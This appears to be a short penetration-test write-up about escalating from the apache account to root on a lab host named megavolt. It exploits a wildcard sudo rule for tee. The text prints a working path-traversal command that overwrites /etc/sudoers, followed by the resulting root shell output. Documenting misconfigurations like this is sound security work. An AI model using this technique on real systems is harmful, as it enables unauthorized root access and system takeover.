sudo tee
The apache account has been granted sudo privileges to execute the command /usr/bin/tee /var/log/httpd/* without requiring a password. The use of the wildcard (*) at the end presents a critical security risk, as it allows arbitrary file paths to be specified.
Because the command runs with elevated privileges, an attacker could exploit path traversal techniques (e.g., ../../../../etc/sudoers) to overwrite sensitive system files, such as /etc/passwd, /root/.ssh/authorized_keys, or /etc/sudoers. This could lead to privilege escalation, unauthorized access, or even complete system compromise.
bash-4.2$ echo 'apache ALL=(ALL) NOPASSWD: ALL' | sudo /usr/bin/tee /var/log/httpd/../../../etc/sudoers
bash-4.2$ sudo -l
User apache may run the following commands on megavolt:
(ALL) NOPASSWD: ALLGranting the sudo ALL privilege the apache user
bash-4.2$ sudo su root
[root@megavolt tmp]# whoami
root
[root@megavolt tmp]# hostname
megavolt
[root@megavolt tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:d8:91 brd ff:ff:ff:ff:ff:ff
inet 192.168.177.115/24 brd 192.168.177.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise